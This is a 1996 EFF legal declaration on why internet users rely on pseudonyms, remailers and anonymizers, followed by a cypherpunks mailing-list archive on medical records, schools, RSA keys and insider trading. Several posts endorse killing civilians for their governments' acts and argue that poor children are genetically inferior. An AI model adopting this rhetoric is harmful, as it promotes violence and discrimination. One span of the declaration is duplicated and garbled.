participate in chats or discussions groups without abandoning their privacy. It permits users to participate in these discussions without revealing their name to strangers, and without fear of retaliation for the expression of unpopular or controversial viewpoints. This protection of privacy furthers the public interest by facilitating freer and more frank discussions, especially on controversial issues such as questions of online privacy and encryption software. 10. Similarly, EFF wants to make the information that we pub lish on such issues freely available to computer network users who seek it but who want to obtain it anonymously, i.e., by requesting it over computer networks using a pseudonym or handle. Again, EFF believes that by protecting the privacy of users by allowing them to obtain information of public interest anonymously, information on these issues can be disseminated more fully and freely over computer networks. 11. In addition, nearly all of EFF's approximately 3500 mem bers use online communications. EFF members both receive and transmit information through a variety of online communications, including the World Wide Web, online mailing lists, discussion groups, chat rooms, computer bulletin boards, and private e-mail. Many of EFF's members use handles or pseudonyms to protect their privacy when communicating over computer networks. Many of these communications pass through the State of Georgia. 12. I have reviewed the language of O.C.G.A. 16-9-93.1, and neither I nor EFF can determine from its language whether commu nication over computer networks using a pseudonym or assumed name constitutes the use of a name that "falsely identifies" the user for the purposes of the criminal sanctions imposed by this statute. Because EFF actively facilitates and encourages the responsible use of pseudonyms in online communications for the protection of privacy, however, and because virtually all of the anonymous communications over computer networks facilitated by EFF are as easily accessible in Georgia as anywhere else in the world, EFF is fearful that our activities could be viewed by a Georgia prosecutor as aiding and abetting violations of the statute. Similarly, EFF is concerned on behalf of our members that those members who communicate over computer networks using pseudonyms or handles could be violating this criminal statute. EFF, both on our own behalf and on behalf of our members, therefore fears prosecution or other enforcement in Georgia under the statute, and seeks guidance from the Court as to the effect and scope of this vague law. Although EFF is concerned about the risk of prosecution, EFF views any such restriction on our activities in furtherance of the public interest as patently unconstitutional, and we fully intend to continue our activities in support of online privacy and free speech despite the passage of this law. 13. In addition to the many other services that EFF provides to our members and to the online community in general is the online publication through EFF's web site of an extensive archive of articles and other information of interest to the online community. EFF's archives include information on government and legislative activities, legal issues and cases, academic freedom, censorship, free expression and other civil liberties, the infor mation infrastructure and network resources, intellectual property, privacy and encryption, net culture and the online community, and social responsibility in the use of online resources. Included within these archives are hundreds of hyperlinks from the EFF web site to other information and resources made available by others on the Internet on related topics. Many of these links use the trade names of the companies, organizations, government agencies or other entities to whom the link is provided. In some cases, EFF uses the logos or other graphical symbols of the organizations to whom we are linking on our web site. EFF does not obtain prior permission from other web publishers before providing links to their web sites in this manner. Given the sheer number of links, EFF could not as a practical matter do so. EFF does not intend to falsely imply that we have obtained such permission or that we are formally affiliated with any of these other entities. EFF is aware that individuals and companies that maintain their own web sites want others to link to their sites as a matter of course. EFF is concerned that its use of these trade names and images could violate the Act and subject EFF or our members to criminal prosecution, when it is the Act, not our actions, that is in defiance of the customary usage and spirit of the Internet. COMPUTER NETWORKS AFFECTED BY THE RESTRICTIONS OF O.C.G.A. 16- 9-93.1 The Global Internet 14. The largest computer network in the world is the Internet. It links a large number of smaller networks set up by universities, industry, nonprofit organizations, governments, and individuals. While estimates can only be approximations due to rapid growth, the Internet is believed to connect at least 59,000 computer networks, 2.2 million computers, 159 countries, and 40 million users. By some estimates, there will be as many as 200 million Internet users by the year 1999. 15. No one owns the Internet. It is a decentralized global medium of communication and expression in which governments, universities, institutions, corporations, and millions of ordinary people can communicate with each other, express opinions, share ideas, educate themselves, and seek, exchange or publish information on every imaginable topic either to specific recipients or to the entire world almost instantaneously and at minimal cost. 16. Virtually anyone can now use the Internet to communicate with other online users. Anyone with a personal computer, modem, and telephone line can obtain access to the Internet through an Internet Service Provider ("ISP"), usually for a fee. Many businesses, universities, and other institutions have computer networks that are directly connected to the Internet and give their employees, faculty, students, etc., free or low-cost Internet access accounts. For those without a computer or access through work or school, many communities have establrnet to communicate with other online users. Anyone with a personal computer, modem, and telephone line can obtain access to the Internet through an Internet Service Provider ("ISP"), usually for a fee. Many businesses, universities, and other institutions have computer net works that are directly connected to the Internet and give their employees, faculty, students, etc., free or low-cost Internet access accounts. For those without a computer or access through work or school, many communities have establternet can travel any number of different paths to get from its origin to its destination. Persons transmitting information over this international computer network have no control over the route their messages take. Any data transmitted over the Internet could potentially travel through the wires or airspace of Georgia. 18. There are hundreds of thousands of Internet users in the State of Georgia, all of whom can communicate with or receive information from any other user on the network anywhere in the world. Commercial Online Services 19. In addition to the global Internet, communications over the large national computer networks known as "commercial online services," including Prodigy, America Online and CompuServe, are also affected by the Act. 20. These services enable their customers to communicate with other customers, access the Internet, and access other proprietary information and services available only to subscribers. There are more than 12 million subscribers to major commercial online services in the United States and overseas; each of these services have customers in Georgia, who use the service to communicate with others throughout the United States (and in some cases, the world). Local Bulletin Board Services ("BBSs") 21. The Act also affects communications over thousands of local dial-in computer services known as Bulletin Board Systems, or "BBSs." With a relatively small investment, anyone with a phone line, computer, modem, and proper software can establish a BBS to allow friends, neighbors, customers, or members of the general public to dial in and communicate with each other on topics of common interest. There are several hundred such BBSs in Georgia, operated by individuals, nonprofit organizations, advocacy groups, and businesses. In addition, there are thousands of additional local BBSs in other states, which can be reached from Georgia over long distance telephone lines or through a network of BBS systems, which allows BBS subscribers to communicate with subscribers to other BBSs in Georgia and throughout the country. THE NATURE OF COMMUNICATION OVER COMPUTER NETWORKS AFFECTED BY THE ACT 22. Computer users communicate with each other over the com puter networks described above in many different ways. The content of all of the following types of communications are restricted by the broad language of the Act. E-Mail 23. E-mail is the basic method of communication over computer networks. It allows one user to send a message to any other user or users on the network. 24. Because mass mailings via e-mail are relatively easy and inexpensive, e-mail enables any user to publish and distribute information on any topic simply by compiling a mailing list of online users and sending the newsletter to everyone. Discussion & Chat Groups 25. One of the most popular forms of communication over com puter networks are "discussion groups." Discussion groups allow users of computer networks to post messages onto a public computerized bulletin board or to an automated electronic mailing list of subscribers, and to read and respond to messages posted by others participating in the discussion group. Discussion groups have been organized on many different computer networks and on virtually every topic imaginable. 26. On the Internet, the bulletin board discussion groups are known as the "USENET" newsgroups and are arranged by subject mat ter. There are currently USENET newsgroups on more than 15,000 different subjects, and over 100,000 new messages are posted to these groups each day. In addition, there are many thousands more Internet discussion groups organized through automated mail ing lists to subscribers. There are still thousands more organized on the various commercial online services and on local BBSs. All or virtually all of these discussion groups are accessible by computer users in Georgia. 27. Similar to discussion groups are "chat groups," which allow users to engage in real time conversations with each other by typing messages and reading the messages typed by others participating in the "chat." Chat groups also occur over the Internet, commercial online services, and local BBSs. These groups are often set up by particular organizations or online services, but any individual user can form an online "chat." Some chat groups are organized for social entertainment, and others are organized by a particular sponsor on particular topics to provide a specific forum for discussion of issues or ideas. 28. Online discussion and chat groups create an entirely new public forum -- analogous to the village green -- in which individuals can associate and communicate with others who have common interests and can engage in discussion or debate on every imaginable topic. Publication and Access to Information: The World Wide Web 29. A third major category of communication on computer net works involves the publication and retrieval of information. Computer networks, and especially the Internet, give individuals of ordinary means a remarkable new power to publish ideas, opinions, poetry, stories, images, video, and sound to the world. This information can then be retrieved by anyone in the world who has access to the network. 30. The World Wide Web is the most popular way to publish and retrieve information on the Internet. Anyone with access to the Internet and proper software can publish "web pages," which may contain text, images, sound and even video. The web is comprised of millions of separate "web sites" that provide content provided by a particular person or organization, and each web site may include one or more different web pages published by the author of the site. Any Internet user anywhere in the world can view the web pages published by others, read their text, look at their images and video, and listen to their sounds. 31. The web was created to serve as the platform for a global, online store of knowledge, containing information from a diversity of sources, and accessible to Internet users around the world. Though information on the web is contained in individual computers, the fact that each of these computers is connected to the Internet through web protocols allows all of the information to become part of a single body of knowledge. It is currently the most advanced information system on the Internet. The Importance of Links on the World Wide Web: 32. The web also provides web authors with the unique ability to "link" different web pages on the Internet together. These "links" can be text or images in a web page that, when selected by the reader, automatically transfer the reader to a different location on the Internet. For example, a particular link might transport the reader to a different part of the same web page or to an entirely different web page stored in an entirely different computer anywhere in the world. 33. The author of any web page can create a "link" that points to any other web page published on the Internet, without having to contact the creator of the document. In fact, Internet custom and usage does not require a web author to contact a document creator, and those who create documents expect and hope to have their pages linked to. Many of the plaintiffs publish such links in their web pages. 34. Many pages on the web are published by corporations or organizations that operate under trade names. Links to those web pages are routinely identified by the trade name of the organization or some other logo or trademark that readily identifies the company or organization to whose web page the link is directed. 35. "Search engines" and "directories" on the web are ser vices that collect and organize millions of different links to web pages. "Search engines," such as Yahoo, Alta Vista, and Webcrawler, allow users to search the entire World Wide Web for particular words or phrases. The search engine then provides a list of web pages that contain the search term and allows the user to "link" to the web page of their choice. "Directories" are large databases of web sites arranged according to subject matter, similar to an online card catalog. Directories provide "links" to relevant web sites on particular subjects. 36. Without these search engines and directories, it would much more difficult for Internet users to locate and retrieve information of interest on the web. Thus, these search engines and directories provide an essential service to all Internet users. They routinely provide many "links" to web pages using the trade names or logos of the companies or organizations to whom they are linking. 37. This critical linking feature is the defining character istic of the web. The web is comprised of all web pages in the world, stored in millions of different computers around the globe. The web is the interlocking system of links created by individual users in each individual page. Linking is encouraged on the web, because it ties different web pages on related topics together into a coherent system, even though the individual web pages themselves might be stored in different computers in different parts of the world. 38. "Cyberspace" refers to the combination of all of the online communications systems described above. WHY PEOPLE COMMUNICATE ANONYMOUSLY IN CYBERSPACE 39. For many of the same reasons that people have histori cally communicated anonymously through other media like print and the telephone, online users frequently communicate anonymously or pseudonymously in cyberspace. 40. Anonymity allows online users to voice unpopular ideas without fear of retaliation. Citizens can engage in political speech without identifying themselves to the party in power. Victims of crime or disease can request help and advice without stigma. 41. Anonymity also eliminates the potential for discrimina tion and harassment according to factors like gender and ethnicity. Many women communicate online under gender-neutral pseudonyms to avoid harassing e-mail. This practice is similar to women who list their telephone numbers under their first initials in order to avoid harassing calls. Similarly, online users may wish to use a pseudonym in order to avoid discrimination or harassment based on names associated with particular ethnic groups. 42. Anonymity also helps online users maintain their privacy. People communicating about unpopular or sensitive issues might suffer unwanted invasions of privacy, both online and offline, if others had access to their real identity. Anonymity also allows famous people to communicate online as "average people," without fear of a privacy invasion. 43. In some cases, anonymity is a necessary security measure. The personal safety of human rights dissidents, domestic abuse victims, and whistle-blowers would be compromised if they could not communicate anonymously. 44. Anonymity also assists users in preventing the collection and potential misuse by third parties of personal information about them. Online communications can be easily tracked, downloaded and stored by anyone; anonymity can prevent unauthorized third parties from tying that information to a particular person. 45. In addition to the advantages of speaking anonymously in cyberspace, online users have many reasons for wanting to access online information anonymously. Many users would be inhibited from accessing controversial, embarrassing, or sensitive information if they first had to reveal their identity. Political information, safe sex information, and information on stigmatizing diseases are just a few examples of content that some users might wish to access anonymously. In addition, because most web sites collect information about visitors, many online users fear that using their real identities would threaten their privacy whenever they access the web. HOW INDIVIDUALS COMMUNICATE ANONYMOUSLY IN CYBERSPACE 46. As a general rule, communications over computer networks typically include identifying information, such as the sender's return address and message routing information. This default identification of the speaker differentiates online communication from communication by print and telephone. 47. Online technology, however, provides users with a variety of ways to communicate over computer networks without revealing their identity. Online Communications Using Pseudonyms or "Screen Names" 48. Many Internet Service Providers, commercial online ser vices, and local BBSs allow users to set up pseudonymous accounts, permitting the user to communicate online using a "screen name," "user name," or "handle" that is a pen name rather than the real name of the account holder. When a user sends mail, publishes newsletters, or participates in discussions or chat groups using this screen name, the message sent is identified as coming from the screen name adopted by the sender. 49. Many service providers allow their users to set up multi ple "screen names" or "user names." This feature allows users to use different names for different purposes. For example, a user might use her real name as a "screen name" when communicating by e-mail with someone she knows personally, but use a pen name as a "screen name" when communicating with strangers. 50. Pseudonymous accounts allow users to have a consistent identity in cyberspace without having to reveal their true identity to the people with whom they are communicating. Anonymous Internet Access Accounts: 51. The use of "screen names" alone, however, does not pro vide complete anonymity to the user, because the user's service provider knows the true identity of the subscriber. To provide additional privacy, some Internet Service Providers and local BBS operators offer anonymous access accounts. That is, they do not require any identification in order to set up an account for communicating over the network. These accounts provide additional privacy and security to the user because even the service provider has no way to identify the true identity of the user. Anonymous and Pseudonymous Remailers: 52. In addition to the use of screen names or anonymous ac cess accounts, there are special services that allow online users who normally communicate online under their real names to send particular messages anonymously or pseudonymously over the Internet. These services are known as pseudonymous and anonymous remailers, and they consist of software programs that run on computers connected to the Internet. When an online user sends e-mail to the remailer address, the remailer strips the identifying information from the message and then forwards the mail to its destination. The recipient receives mail that has no evi dence indicating its point of origin. Remailers can be used to send individual e-mail and to post messages to mailing lists or USENET newsgroups. 53. "Pseudonymous remailers" are remailers that set up ac counts for repeated use. The operator of a pseudonymous remailer knows the account holder's real e-mail address but provides the account holder with a secret numeric identifier that is used whenever the account holder sends a message through the remailer. Other anonymous users, each with their own secret numeric identifier, can then reply to the anonymous message. This allows users to create a double-blind situation where two or more users can have an ongoing exchange without ever knowing the identity of the other users. 54. Anonymous remailers do not require setting up any account with the service. Any Internet user can use these services by sending an e-mail message to the remailer, which will forward it anonymously to its final destination. 55. Currently, there are over 20 public remailers that any online user may use free of charge. 56. To prevent abuse of such remailers, there are programs available to the public, known as "kill files" and "bozo filters," that provide online users with the means to screen out anonymous messages if they desire. These programs reduce the likelihood of harm from misuse of anonymous remailers. Online Publishing Under Pseudonyms or Anonymously 57. As in the case of e-mail, many publishers in the online medium choose to do so using pen names. 58. For additional anonymity, some Internet Service Providers also allow persons and organizations to set up and maintain web pages anonymously. Anonymous Access Services: 59. Conversely, many online users seek to receive information anonymously over the Internet. As a general rule, however, obtaining information anonymously over the Internet is difficult because every time an online user visits a web site, she leaves a digital "calling card" that reveals the address of the computer from which she is linked to the Internet, the address of the web site she last visited, the kind of computer she is using, and other details. Most web sites keep logs with this information on all of the visitors that access their sites. 60. Many online users fear that their privacy will be invaded if data collected by web sites is misused, particularly where the user has no knowledge of the amount of data being collected by various web site operators. 61. To assist online users in protecting their privacy, there are now services that allow online users to access information anonymously on the Internet. These services, called "anonymizers," serve as middlemen between the user and the par ticular pages he wants to retrieve. An anonymizer strips all references to the user's e-mail address, computer type, and previous page visited before downloading the web page to the user. If the user follows a link from a page accessed through the anonymizer, the linked page is also accessed anonymously. I, Shari Steele, declare under penalty of perjury that the foregoing is true and correct. Executed this ______ day of September, 1996. ________________________________ SHARI STEELE STAFF COUNSEL ELECTRONIC FRONTIER FOUNDATION From tcmay at got.net Wed Sep 25 19:09:17 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 10:09:17 +0800 Subject: Medical Data Message-ID: At 2:28 PM 9/25/96, Phil Fraering wrote: >Of course, one area where the doctor will continue to hold a patient's >records, instead of the patient, due to the nature of the current system: > >Prescription medication. > Digitally signed prescriptions from qualified doctors. (Not that I support this system...I rather like the "anarchy" of Mexico, where one walks into a pharmacy in Tijuana and can buy purt near anything). >Of course, with the really big problems with this stuff, drug >interactions, there's still no system for a doctor to find out what you're >on thanks to another doctor. Which is why it's very important to always >use the same pharmacist. The lesson of the last decade has been that _interested patients_ often do more research about their conditions and various drug effects than their doctors can. (This happened with a friend of mine, who ultimately died, and a similar case was recently detailed about Andy Grove, of Intel, who did exhaustive research on the Net about his condition...making him (finally) a real user of the Net. There was also a movie, "Lorenzo's Oil," about this exact situation.) In any case, the issue of which drugs one may be taking and maintenance of "drug interaction databases" is not a core issue. One can selectively release the list of drugs being considered to an "oracle" machine, and check for dangerous interactions. Or tell the physician, which is certainly no worse than the current situation. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ses at tipper.oit.unc.edu Wed Sep 25 19:14:31 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 26 Sep 1996 10:14:31 +0800 Subject: Possible snake oil? In-Reply-To: Message-ID: 1024 bit keylengths are commonly used with RSA, and are generally considered to be secure. Remember, key lengths can't easily be compared between algorithms from radically different familys Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From dbell at maths.tcd.ie Wed Sep 25 19:18:34 1996 From: dbell at maths.tcd.ie (Derek Bell) Date: Thu, 26 Sep 1996 10:18:34 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <3.0b24.32.19960924064658.006b3540@mail.teleport.com> Message-ID: <9609251925.aa18524@salmon.maths.tcd.ie> In message <3.0b24.32.19960924064658.006b3540 at mail.teleport.com>, Rich Burrough s writes: >At 08:33 PM 9/23/96 -0700, tcmay at got.net (Timothy C. May) wrote in response to PH-B: >>I for one don't respond well to extortion threats, so write your damned >>article. I agree; PH-B is commiting a bunch of fallacies here and tarring all cypherpunks with the same brush as Jim Bell just because they haven't repudiated Assasination Politics is just being obnoxious. >I personally don't have the time or energy to contribute to the AP threads. >That != approval for the idea. Ditto; I could spend time analysing AP, but life's too short to waste it on refuting everything I disagree with in detail. Derek "who is _not_ Jim" Bell From dlv at bwalk.dm.com Wed Sep 25 19:19:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 10:19:17 +0800 Subject: AP In-Reply-To: <9609251845.aa16492@salmon.maths.tcd.ie> Message-ID: Derek Bell writes: > In message , "Dr.Dimitri Vulis KOTM" writes: > >Yes, I do. > > I'm not sure what you mean here. Is it: > 1. You hold people respobsible for what they did, not what their government > did. (Assuming said people didn't take part in what the government did.) > > 2. You agree that the IRA could justify killing any British citizen, even if > said citizen supported the IRA or agreed with its aims. > > 3. Something else. (Please specify.) (Redirected to the list.) Any British citizen, irrespective of s/he thinks about the IRA, has benefited economically from the 800 years of pillaging and genocide in Ireland. I see no problem if they pay with their lives for these crimes. Likewise I see no problem if U.S. civilians pay with their lives for their government's crimes in Iraq, even if they happen to disapprove of these crimes. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Wed Sep 25 19:21:01 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 10:21:01 +0800 Subject: Medical Data Message-ID: At 4:27 PM 9/25/96, Asgaard wrote: >On Tue, 24 Sep 1996, Timothy C. May wrote: > >> Why can't patients carry their _own_ medical records, and disclose what >> they wish to disclose to doctors and hospitals, as they see fit? Whether >> implemented in a high-tech version, as a "smart card," or a low-tech >> version, as a "dossier" (a file folder), the principle's the same. > >One problem is when a patient is suing his doctor, but claiming that his >'dossier' was lost in a fire. The doctor then has to defend himself >with only 'your word against mine' instead of having his own account >of what was happening on file, including test results etc that could >be very interesting for the defence. Well, this is a potentially confusing hypothetical, and a short paragraph description doesn't do it justice. - did not the patient have backups? if not, why not? - the doctor will have records of what _he_ did, and records of _what was disclosed to him_ by the patient. This should be enough, as his "end" has done exactly what was agreed to. (Indeed, the unrevealed parts of the dossier are not known to him, but then they were "unrevealed," which is the whole point. That the "unrevealed" parts were lost or destroyed in a head crash, or whatever, is not germane at all.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From themom at nando.net Wed Sep 25 19:28:12 1996 From: themom at nando.net (themom) Date: Thu, 26 Sep 1996 10:28:12 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Dan Harmon wrote: > > > On Tue, 24 Sep 1996, William H. Geiger III wrote: > > > Dan Harmon said: > > > >One of the hardest things that we have to work hardest to counter-act > > >with our twins, who attend PS, is the socialization they > > >pick up at school. > > > > There is an easy solution to that problem, it's called home school. :) > > > Really there is no 'Correct' solution some students function better in Public Schools, some in private and others in home. I know of success stories and failures in each. I had a couple of friends who were in home school during their Freshman and Sophomore year in highschool but then decided to go back to public school, they were so far behind it wasn't funny...any ways, one droped out and then other is just now getting back in the "groove" of things (he is a junior). I guess the choice of schools is up to the individual, personally I am a student of a Public school, Enloe High, and truely hate it, I would perfer being in a private school but, I do not have that kind of money to spend, sure I could go to a cheep private school and not have the advantages of the people in public schools which (strangely) have more money. I could also do home school but my parents would drive me insane . But I totally disagree with the posts saying public school students become drug dealers, NONE, of my friends do drugs, drink, smoke, etc... Most students turn out to be functional members of society, with a few odd balls ruining the reputation of the public school system... Thats just my two cents..... Brent From levine at blatz.cs.uwm.edu Wed Sep 25 19:33:28 1996 From: levine at blatz.cs.uwm.edu (Prof. L. P. Levine) Date: Thu, 26 Sep 1996 10:33:28 +0800 Subject: your mail In-Reply-To: Message-ID: <199609251822.NAA18129@blatz.cs.uwm.edu> I am not sure why comp-privacy at uwm.edu should be a part of this discussion. please take me out of this. ---------------------------------+----------------------------------------- Leonard P. Levine | Moderator of: Computer Privacy Digest Professor of Computer Science | and comp.society.privacy University of Wisconsin-Milwaukee | Post: comp-privacy at uwm.edu Box 784, Milwaukee WI 53201 | Information: comp-privacy-request at uwm.edu | Gopher: gopher.cs.uwm.edu levine at cs.uwm.edu | URL: http:/www.uwm.edu/org/comp-privacy/ ---------------------------------+----------------------------------------- >robert, good to hear from you again...what else is new and exciting on your front...norseen > From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 25 19:34:19 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 26 Sep 1996 10:34:19 +0800 Subject: Edited Edupage, 19 Sept 1996 Message-ID: <01I9WCSFW5FY8Y53G5@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 20-SEP-1996 01:52:41.56 >***************************************************************** >Edupage, 19 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >***************************************************************** >LUCENT'S NET SOFTWARE MAKES INTERNET PHONE CALLS EASY >New software developed by Lucent Technologies is designed to give Internet >callers quicker access to one another and allows them to converse via their >computers as if they were on a regular speaker-phone. Previous software has >been half-duplex -- one party must stop speaking before the other can >"capture" the line. Lucent plans to market the software to AT&T, the Bell >companies and Internet service providers for distribution to their >customers. By the end of the year, Lucent plans to enhance the software so >that users can videoconference over the Internet. (Wall Street Journal 18 >Sep 96 B8) I'd wonder if a patch can be built to encrypt each packet as it goes out? I'm guessing that what they've done is improve the voice compression, so there will be a relatively small amount of data to encrypt. >PROGRAMMABLE COMPUTER CHIPS >Next month, Metalithic Systems Inc. will release a $1500 sound board called >Digital Wings that uses field-programmable gate array computer chips that >can be personalized, allowing the user to create and edit up to 128 >soundtracks. When used in combination with Windows 95, Digital Wings will >give users access to audio synthesis and editing tools comparable to those >of a professional sound studio. (Business Week 23 Sep 96 p86) I wonder exactly how reprogrammable this system is... >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >*************************************************************** >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Alfred Adler (if your name is Alfred Adler; otherwise, substitute your own >name). ... To cancel, send a message to: listproc at educom.unc.edu with the >message: unsubscribe edupage. (If you have subscription problems, send >mail to manager at educom.unc.edu.) From saunders at mcgraw-hill.com Wed Sep 25 19:55:16 1996 From: saunders at mcgraw-hill.com (saunders at mcgraw-hill.com) Date: Thu, 26 Sep 1996 10:55:16 +0800 Subject: your mail Message-ID: <199609251928.AA19822@interlock.mgh.com> whose list is this, and why am I on it? Please delete my name now. ______________________________ Reply Separator _________________________________ Subject: Re: your mail Author: Robert Steele at CCNODE Date: 9/25/96 11:55 AM Requiring people to call Betty to tell her they sent email is very low rent and will discredit the site. Recommend you delete that element. Like putting roller skates on a horse! From pgf at acadian.net Wed Sep 25 19:57:58 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 10:57:58 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Phil Fraering writes: > > Without vouchers, you don't say anything about the intelligence of your > > test subjects; to a _very_ large degree, intelligence isn't genetic. Or > > That's the political correct thing to say, but do you have any scientific > evidence to support this claim? All the smart people I know with stupid kids? > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps > Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From dlv at bwalk.dm.com Wed Sep 25 20:09:42 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 11:09:42 +0800 Subject: [RANT] Public schools Message-ID: Jay Gairson writes: > First off, what does this have to do with cryptography? or anything > cypher for that matter? Nothing. Neither does most other stuff posted to this list. > On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > > > U.S. public school system is darwinian evolution in action. Parents who > > > > afford to send their kids to private schools, do so. Parents who send t > > > > kids to public schools deserve to have their offsprings fucked up, ment > > > > and phsyically, to improve the species' gene pool. > > So, basically your saying, since my parents cannot afford to pay for a > private school for me, we are genetically inferior to those who can? In general, on the average, yes. > Because hate tell ya, but I've ran into some major idiots that go to > private schools. Also to consider that from the school I go to, last > year we had two perfect sat scores (no problems missed). Oh yes - I've seen idiots at private schools and I've seen smart kids at public schools. They're exceptions. Judging from your abuse of the English language, you're not. The cirricula at public schools and the SAT requirements are pretty lame, so any kid willing to spend enough time on them can become a straight A student and feel good about himself/herself. I'm not impressed. > > > But the cutoff is often whether the parents can afford to send their kids > > > to private school, not whether or not they're genetically superior. > > > > You must have attended a public school if you don't understand that geentic > > superiority leads to economic success. My older kid goes to a private scho > > The parents are obviously genetically superior to public school parents. > > I am assuming from what you have said in that statement, that you believe > since he may have gone to a public school, it has made him have the > opinion he does? Opinions change. His snotty attitude toward learning, his propensity to wallow in his stupidity and ignorance the way a pig wallows in its own excrement is a trait commonly acquired in the U.S. public school system. > Also, in your statement that your older kid goes to a private school, and > that the parents are obviously genetically superior to public school > parents. You seem to be saying that YOU are genetically superior to my > parents? I believe myself to be genetically superior to the vast majority of the population. Not knowing much about your parents, other than they can't afford to send you to a better school, I assume that they're part of this vast majority. (Make it both intellectually and physically superior. :-) > Another thing to consider here is, from this line of statements, you are > saying that children who have parents who made it well in, let us say the > movie buisness (or even drug buisness), and then send there children to > public schools, are genetically superior because they can act (lie) > better than my parents. For if this is so, that must mean that my aunt > is genetically superior to my mother (who is a teacher at a private > school, but she did not go to a private school) and to her parents, for > she is making more money, and if she ever has children they will be > genetically superior to me, because they will have more money? In general, on the average, yes. I believe that being able to afford a good private school for one's kids is a trait correlated to desirable traits, some of which are inherited by the kids who benefit from the better education. That's eugenics in action. > > Push vouchers. What's the cryptorelevance of your comments, anyway? > > > > Umm, where you not the one that started this conversation? Nope. > > No, on the contrary, sending poor kids to good schools on scholarships > > does not improve their genes. They tend to become drug dealers. > > Hate to inform you on this but, it is more often than not the children > sent by there rich mama and papa to school, that end up on drugs or as > drug dealers, than the ones that start out with scholarships (For the > ones with scholarships have more to loose, than the ones with the rich > mama and papa, for the rich mama and papa can afford the big expensive > lawyer.). Just look at the studies and such done on this type of area. Can you site any such studies? They certainly contradict what I know about this area, and I consider myself pretty well-informed. > Also you have to consider that generally the ones that end up as drug > dealers, are the children who have parents that where drug dealers and > such or had experience in such, or just had parents who didn't care what That's pretty much what I said. Other disciplinary problems (poor attendance, talking back to teachers, weird dress, sex, etc) also tend to be associated with the poor kids admitted on scholarships. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From deviant at pooh-corner.com Wed Sep 25 20:31:05 1996 From: deviant at pooh-corner.com (The Deviant) Date: Thu, 26 Sep 1996 11:31:05 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Date: Wed, 25 Sep 96 13:40:17 EDT > From: "Dr.Dimitri Vulis KOTM" > To: cypherpunks at toad.com > Subject: Re: Hallam-Baker demands more repudiations or he'll write! > > Phil Fraering writes: > > It's widely believed that the New Orleans Mafia (the source of my recent > > statement about body decomposition in Louisiana swamps) was a prime driver > > in the assasination of the late President John F. Kennedy. > > > > I think it's fairly safe to say that having done this didn't do them a > > damn bit of good. It didn't do anyone else a damn bit of good. > > JFK deserved to die. > Wile i neither agree nor disagree with your point, it does seem a bit irrelavant, but thats just MHO. --Deviant If you look rather casual with the knife when you flick it open, people don't like it. -- Gerry Youghkins From unicorn at schloss.li Wed Sep 25 20:44:52 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 11:44:52 +0800 Subject: Insider Trading - What constitutes "Disclosure" ? Message-ID: This is not legal advice. You got it for free. Often the choice faced by the investor who has material non-public information is characterized as "disclose or abstain," meaning that the investor may either trade after disclosing or abstain from trading on the information. A few people have asked me what constitutes disclosure. I've not researched the latest cases, but the generally accepted "best description" can be found in SEC v. Texas Gulf Sulpher Co., 401 F.2d 833 (2d Cir.1968), cert. denied. As to the defense's claim that their purchases of stock were not proscribed because the news had effectively been disclosed, the court offered: (errors mine) Crawford (defendant) telephoned his orders to his Chicago broker about midnight on April 15 and again at 8:30 in the morning of the 16th, with instructions to buy at the opening of the Midwest Stock Exchange. The trial court's finding that "he sought to, and did, 'beat the news,' 258 F.Supp. at 287, is well documented by the record.. The rumors of a major ore strike which had been circulated in Canada and , to a lesser extent, in New York, had been disclaimed by the TGS press release of April 12, which significantly promised the public an official detailed announcement when possibilities had ripened into actualities. The abbreviated announcement to the Canadian press at 9:40 